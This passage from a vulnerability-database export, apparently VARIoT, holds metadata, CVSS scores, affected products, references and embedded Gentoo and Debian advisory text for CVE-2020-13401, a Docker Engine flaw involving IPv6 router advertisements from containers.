      },
      {
        "db": "NVD",
        "id": "CVE-2022-2068",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2022-06-21T00:00:00",
        "db": "VULMON",
        "id": "CVE-2022-2068",
        "ident": null
      },
      {
        "date": "2022-08-10T15:50:41",
        "db": "PACKETSTORM",
        "id": "168022",
        "ident": null
      },
      {
        "date": "2022-06-28T19:12:00",
        "db": "PACKETSTORM",
        "id": "169396",
        "ident": null
      },
      {
        "date": "2022-08-19T15:03:34",
        "db": "PACKETSTORM",
        "id": "168112",
        "ident": null
      },
      {
        "date": "2023-01-26T15:29:09",
        "db": "PACKETSTORM",
        "id": "170741",
        "ident": null
      },
      {
        "date": "2022-12-12T23:02:21",
        "db": "PACKETSTORM",
        "id": "170196",
        "ident": null
      },
      {
        "date": "2022-12-08T21:28:21",
        "db": "PACKETSTORM",
        "id": "170165",
        "ident": null
      },
      {
        "date": "2023-10-31T13:11:25",
        "db": "PACKETSTORM",
        "id": "175432",
        "ident": null
      },
      {
        "date": "2022-12-09T14:52:40",
        "db": "PACKETSTORM",
        "id": "170179",
        "ident": null
      },
      {
        "date": "2024-11-04T16:28:12",
        "db": "PACKETSTORM",
        "id": "182466",
        "ident": null
      },
      {
        "date": "2022-06-21T15:15:09.060000",
        "db": "NVD",
        "id": "CVE-2022-2068",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2022-2068",
        "ident": null
      },
      {
        "date": "2025-11-03T22:15:58.023000",
        "db": "NVD",
        "id": "CVE-2022-2068",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "175432"
      }
    ],
    "trust": 0.1
  },
  "title": {
    "_id": null,
    "data": "Red Hat Security Advisory 2022-6024-01",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "168022"
      }
    ],
    "trust": 0.1
  },
  "type": {
    "_id": null,
    "data": "arbitrary",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "169396"
      },
      {
        "db": "PACKETSTORM",
        "id": "175432"
      }
    ],
    "trust": 0.2
  }
}

VAR-202006-0429

Vulnerability from variot - Updated: 2024-11-23 23:01

An issue was discovered in Docker Engine before 19.03.11. An attacker in a container, with the CAP_NET_RAW capability, can craft IPv6 router advertisements, and consequently spoof external IPv6 hosts, obtain sensitive information, or cause a denial of service. Docker Engine There is an input verification vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 202008-15

                                       https://security.gentoo.org/

Severity: Normal Title: Docker: Information disclosure Date: August 26, 2020 Bugs: #729208 ID: 202008-15

Synopsis

A flaw in Docker allowed possible information leakage.

Background

Docker is the world’s leading software containerization platform.

Affected packages

-------------------------------------------------------------------
 Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------

1 app-emulation/docker < 19.03.12 >= 19.03.12

Description

It was found that Docker created network bridges which by default accept IPv6 router advertisements.

Workaround

There is no known workaround at this time.

Resolution

All Docker users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=app-emulation/docker-19.03.12"

References

[ 1 ] CVE-2020-13401 https://nvd.nist.gov/vuln/detail/CVE-2020-13401

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

https://security.gentoo.org/glsa/202008-15

Concerns?

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.

License

Copyright 2020 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5 .

For the stable distribution (buster), this problem has been fixed in version 18.09.1+dfsg1-7.1+deb10u2.

We recommend that you upgrade your docker.io packages.

For the detailed security status of docker.io please refer to its security tracker page at: https://security-tracker.debian.org/tracker/docker.io

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAl7+KBwACgkQEMKTtsN8 TjbyYBAAg+O+0IgB1qBQyB11lKb7t0MGrqo35/MOnYgQK8jbcqBGPQ0eDAfU9z7R C7ixPlMZvu90S+pXNonfOTCwZQ+UrlSzM6wc2HNI2mjp+BId0rpPtxIqr1hcDNGz IAu+hqxFEZhTu6+olK5qyXCRbz38d2Kg/8uS8YznO6IEvhcAjygnSGRR9EfsaC4R jYMD3tJ8vUgEkJRZmZucicCswqC8WczN8a6fHH6Glbs3eIT2vlFINhFZM8PWQ4E/ vtjf8+JPkfrTe7Y2/SMnBkE082gS1/WjYrKXj8RAMJ2M2Y61O9RdGX+wD3NOwjS0 /6PVf2T9+/QbNAQrQFGcnw3uvsSbSiFgaFGhGuI+DJ6yJfrgXSO1Iis9wrCZ0DlK MLJrDP+u+ZQm7U6GNYNiwBnHocl9s4cYNhTj5QaEM76O51Wt2MVuj4t777W9Zdp9 Jt1lFwHJb1KHizYSxySEp3AJcAcSXv89JA2dxtSdEZGojaPoXouRfXqvybWNu2hP wvpWqYeRHlXw32kpq7xrb1uEMkMBlkh6O/d8JeNpFI/Hd3Cl610JbGIYLhTK5A9w m5q4nGADFF0SDEFQmZEVKFJNIlIQKX7MspdAc7nPBfGWQ8Xhttx4Vag0z6HvSxDS ST2wwG0W5O4NNjr3ibdm6JpEgGcZjWDPgqFSH5UkKgDC712SyUc= =vIL3 -----END PGP SIGNATURE-----

Show details on source website
To clipboard 

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202006-0429",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "sannav",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "broadcom",
        "version": null
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "32"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "31"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "model": "engine",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "docker",
        "version": "19.03.11"
      },
      {
        "model": "engine",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "docker",
        "version": "19.03.11"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-005933"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-13401"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/a:docker:engine",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-005933"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Gentoo",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "158980"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-073"
      }
    ],
    "trust": 0.7
  },
  "cve": "CVE-2020-13401",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 6.8,
            "id": "CVE-2020-13401",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 1.1,
            "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Medium",
            "accessVector": "Network",
            "authentication": "Single",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 6.0,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-005933",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "LOW",
            "baseScore": 6.0,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 1.8,
            "id": "CVE-2020-13401",
            "impactScore": 3.7,
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L",
            "version": "3.1"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "Low",
            "baseScore": 6.0,
            "baseSeverity": "Medium",
            "confidentialityImpact": "Low",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-005933",
            "impactScore": null,
            "integrityImpact": "Low",
            "privilegesRequired": "Low",
            "scope": "Changed",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2020-13401",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "JVNDB-2020-005933",
            "trust": 0.8,
            "value": "Medium"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202006-073",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2020-13401",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-13401"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-005933"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-073"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-13401"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An issue was discovered in Docker Engine before 19.03.11. An attacker in a container, with the CAP_NET_RAW capability, can craft IPv6 router advertisements, and consequently spoof external IPv6 hosts, obtain sensitive information, or cause a denial of service. Docker Engine There is an input verification vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory                           GLSA 202008-15\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n                                           https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n    Title: Docker: Information disclosure\n     Date: August 26, 2020\n     Bugs: #729208\n       ID: 202008-15\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nA flaw in Docker allowed possible information leakage. \n\nBackground\n==========\n\nDocker is the world\u2019s leading software containerization platform. \n\nAffected packages\n=================\n\n    -------------------------------------------------------------------\n     Package              /     Vulnerable     /            Unaffected\n    -------------------------------------------------------------------\n  1  app-emulation/docker        \u003c 19.03.12               \u003e= 19.03.12\n\nDescription\n===========\n\nIt was found that Docker created network bridges which by default\naccept IPv6 router advertisements. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Docker users should upgrade to the latest version:\n\n  # emerge --sync\n  # emerge --ask --oneshot --verbose \"\u003e=app-emulation/docker-19.03.12\"\n\nReferences\n==========\n\n[ 1 ] CVE-2020-13401\n      https://nvd.nist.gov/vuln/detail/CVE-2020-13401\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/202008-15\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2020 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttps://creativecommons.org/licenses/by-sa/2.5\n. \n\nFor the stable distribution (buster), this problem has been fixed in\nversion 18.09.1+dfsg1-7.1+deb10u2. \n\nWe recommend that you upgrade your docker.io packages. \n\nFor the detailed security status of docker.io please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/docker.io\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAl7+KBwACgkQEMKTtsN8\nTjbyYBAAg+O+0IgB1qBQyB11lKb7t0MGrqo35/MOnYgQK8jbcqBGPQ0eDAfU9z7R\nC7ixPlMZvu90S+pXNonfOTCwZQ+UrlSzM6wc2HNI2mjp+BId0rpPtxIqr1hcDNGz\nIAu+hqxFEZhTu6+olK5qyXCRbz38d2Kg/8uS8YznO6IEvhcAjygnSGRR9EfsaC4R\njYMD3tJ8vUgEkJRZmZucicCswqC8WczN8a6fHH6Glbs3eIT2vlFINhFZM8PWQ4E/\nvtjf8+JPkfrTe7Y2/SMnBkE082gS1/WjYrKXj8RAMJ2M2Y61O9RdGX+wD3NOwjS0\n/6PVf2T9+/QbNAQrQFGcnw3uvsSbSiFgaFGhGuI+DJ6yJfrgXSO1Iis9wrCZ0DlK\nMLJrDP+u+ZQm7U6GNYNiwBnHocl9s4cYNhTj5QaEM76O51Wt2MVuj4t777W9Zdp9\nJt1lFwHJb1KHizYSxySEp3AJcAcSXv89JA2dxtSdEZGojaPoXouRfXqvybWNu2hP\nwvpWqYeRHlXw32kpq7xrb1uEMkMBlkh6O/d8JeNpFI/Hd3Cl610JbGIYLhTK5A9w\nm5q4nGADFF0SDEFQmZEVKFJNIlIQKX7MspdAc7nPBfGWQ8Xhttx4Vag0z6HvSxDS\nST2wwG0W5O4NNjr3ibdm6JpEgGcZjWDPgqFSH5UkKgDC712SyUc=\n=vIL3\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-13401"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-005933"
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-13401"
      },
      {
        "db": "PACKETSTORM",
        "id": "158980"
      },
      {
        "db": "PACKETSTORM",
        "id": "168872"
      }
    ],
    "trust": 1.89
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-13401",
        "trust": 2.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2020/06/01/5",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-005933",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "158980",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.2291",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.2455",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-073",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2020-13401",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "168872",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-13401"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-005933"
      },
      {
        "db": "PACKETSTORM",
        "id": "158980"
      },
      {
        "db": "PACKETSTORM",
        "id": "168872"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-073"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-13401"
      }
    ]
  },
  "id": "VAR-202006-0429",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.625
  },
  "last_update_date": "2024-11-23T23:01:22.258000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Docker Engine release notes",
        "trust": 0.8,
        "url": "https://docs.docker.com/engine/release-notes/"
      },
      {
        "title": "19.03.11",
        "trust": 0.8,
        "url": "https://github.com/docker/docker-ce/releases/tag/v19.03.11"
      },
      {
        "title": "Docker Engine Enter the fix for the verification error vulnerability",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=121128"
      },
      {
        "title": "Debian CVElist Bug Report Logs: docker.io: CVE-2020-13401",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=087e69ea0b29836f02749d216abff19f"
      },
      {
        "title": "Debian Security Advisories: DSA-4716-1 docker.io -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=ce0915ae3e47fbdac9f83db65fc23697"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2020-1376",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2020-1376"
      },
      {
        "title": "Amazon Linux 2: ALAS2DOCKER-2021-002",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2DOCKER-2021-002"
      },
      {
        "title": "Amazon Linux 2: ALAS2NITRO-ENCLAVES-2021-002",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2NITRO-ENCLAVES-2021-002"
      },
      {
        "title": "CVE-2020-13401 Study",
        "trust": 0.1,
        "url": "https://github.com/mmzaeimi/CVE-2020-13401 "
      },
      {
        "title": "CVE-2020-13401 Study",
        "trust": 0.1,
        "url": "https://github.com/mmzaeimi/Docker-Container-CVE-2020-13401 "
      },
      {
        "title": "Awesome Cloud Native Security \ud83d\udc3f",
        "trust": 0.1,
        "url": "https://github.com/reni2study/Cloud-Native-Security2 "
      },
      {
        "title": "Awesome Cloud Native Security \ud83d\udc3f",
        "trust": 0.1,
        "url": "https://github.com/atesemre/awesome-cloud-native-security "
      },
      {
        "title": "Awesome Cloud Native Security \ud83d\udc3f",
        "trust": 0.1,
        "url": "https://github.com/brant-ruan/awesome-cloud-native-security "
      },
      {
        "title": "Awesome Cloud Native Security \ud83d\udc3f",
        "trust": 0.1,
        "url": "https://github.com/Metarget/awesome-cloud-native-security "
      },
      {
        "title": "PoC in GitHub",
        "trust": 0.1,
        "url": "https://github.com/soosmile/POC "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-13401"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-005933"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-073"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-20",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-005933"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-13401"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.8,
        "url": "https://www.debian.org/security/2020/dsa-4716"
      },
      {
        "trust": 1.8,
        "url": "https://security.gentoo.org/glsa/202008-15"
      },
      {
        "trust": 1.7,
        "url": "https://docs.docker.com/engine/release-notes/"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2020/06/01/5"
      },
      {
        "trust": 1.7,
        "url": "https://github.com/docker/docker-ce/releases/tag/v19.03.11"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00040.html"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20200717-0002/"
      },
      {
        "trust": 1.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13401"
      },
      {
        "trust": 1.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/dn4jqaoxbe3xunk3fd423lhe3k74emjt/"
      },
      {
        "trust": 1.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/kjzlkrcojmoguiji2as27bozs3rbef3k/"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-13401"
      },
      {
        "trust": 0.6,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/kjzlkrcojmoguiji2as27bozs3rbef3k/"
      },
      {
        "trust": 0.6,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/dn4jqaoxbe3xunk3fd423lhe3k74emjt/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/158980/gentoo-linux-security-advisory-202008-15.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/support/pages/node/6455281"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-docker-affects-ibm-infosphere-information-server/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.2291/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-spectrum-discover-has-addressed-multiple-security-vulnerabilities-cve-2020-13401-cve-2019-20372-2/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-private-is-vulnerable-to-a-docker-vulnerability-cve-2020-13401/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-docker-affects-cloud-pak-sytem-cve-2020-13401/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.2455/"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/docker-engine-man-in-the-middle-via-ipv6-router-advertisement-32394"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2020-13401"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-docker-vulnerability-affects-ibm-spectrum-protect-plus-cve-2020-13401/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-multiple-vulnerabilities-6/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-multiple-vulnerabilities-4/"
      },
      {
        "trust": 0.6,
        "url": "https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-affected-by-multiple-vulnerabilities-5/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/20.html"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=962141"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/mmzaeimi/cve-2020-13401"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "https://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/docker.io"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-13401"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-005933"
      },
      {
        "db": "PACKETSTORM",
        "id": "158980"
      },
      {
        "db": "PACKETSTORM",
        "id": "168872"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-073"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-13401"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2020-13401"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-005933"
      },
      {
        "db": "PACKETSTORM",
        "id": "158980"
      },
      {
        "db": "PACKETSTORM",
        "id": "168872"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-073"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-13401"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-06-02T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-13401"
      },
      {
        "date": "2020-06-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-005933"
      },
